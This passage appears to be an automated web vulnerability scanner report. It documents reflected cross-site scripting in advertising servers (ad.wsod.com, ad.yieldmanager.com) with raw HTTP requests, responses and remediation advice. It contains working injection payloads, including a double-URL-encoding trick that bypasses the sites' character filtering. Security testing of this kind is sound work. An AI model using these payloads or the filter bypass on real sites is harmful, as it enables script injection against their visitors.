Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33ae354";alert(1)//424e1783b9d/1290209581**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b84c0"><script>alert(1)</script>a09472ff739 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2362
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... oe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*b84c0"><script>alert(1)</script>a09472ff739http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f52c"-alert(1)-"37bd5be3146 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2332
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... oe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*7f52c"-alert(1)-"37bd5be3146"> ...[SNIP]...
2.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4dd2"-alert(1)-"7f1a0a0fe72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2338
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... e3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a4dd2"-alert(1)-"7f1a0a0fe72=1"> ...[SNIP]...
2.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc74e"><script>alert(1)</script>405f7dc3d84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2368
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... e3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&dc74e"><script>alert(1)</script>405f7dc3d84=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of the 10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ce6'-alert(1)-'7a6a2b33397 was submitted in the 10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:33:21 GMT; path=/
Set-Cookie: i_1=46:475:844:44:0:32947:1290209601:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:33:21 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 730
function wsod_image() { document.write('<a href="http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*86ce6'-alert(1)-'7a6a2b33397http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.844.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cdd98fbef0 was submitted in the REST URL parameter 2. This input was echoed as 8332a"><script>alert(1)</script>8cdd98fbef0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313578332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cdd98fbef0/475.0.iframe.200x33/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313578332a"><script>alert(1)</script>8cdd98fbef0/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26807%2522%253balert%25281%2529%252f%252fce3e2d56175 was submitted in the REST URL parameter 2. This input was echoed as 26807";alert(1)//ce3e2d56175 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135726807%2522%253balert%25281%2529%252f%252fce3e2d56175/475.0.iframe.200x33/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135726807";alert(1)//ce3e2d56175/475.0.iframe.200x33/1290209586**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83dff2bd15c was submitted in the REST URL parameter 3. This input was echoed as 3fd2f"><script>alert(1)</script>83dff2bd15c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x333fd2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83dff2bd15c/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x333fd2f"><script>alert(1)</script>83dff2bd15c/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6313f%2522%253balert%25281%2529%252f%252f64bea35dc56 was submitted in the REST URL parameter 3. This input was echoed as 6313f";alert(1)//64bea35dc56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x336313f%2522%253balert%25281%2529%252f%252f64bea35dc56/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x336313f";alert(1)//64bea35dc56/1290209589**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
2.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a88b6'-alert(1)-'00389b2718a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:35:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:35:16 GMT; path=/
Set-Cookie: i_1=46:475:692:44:0:32947:1290209716:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:35:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 734
function wsod_image() { document.write('<a href="http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a88b6'-alert(1)-'00389b2718a=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.692.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out mo ...[SNIP]...
2.61. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.yieldmanager.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9071"-alert(1)-"47372ef7d14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.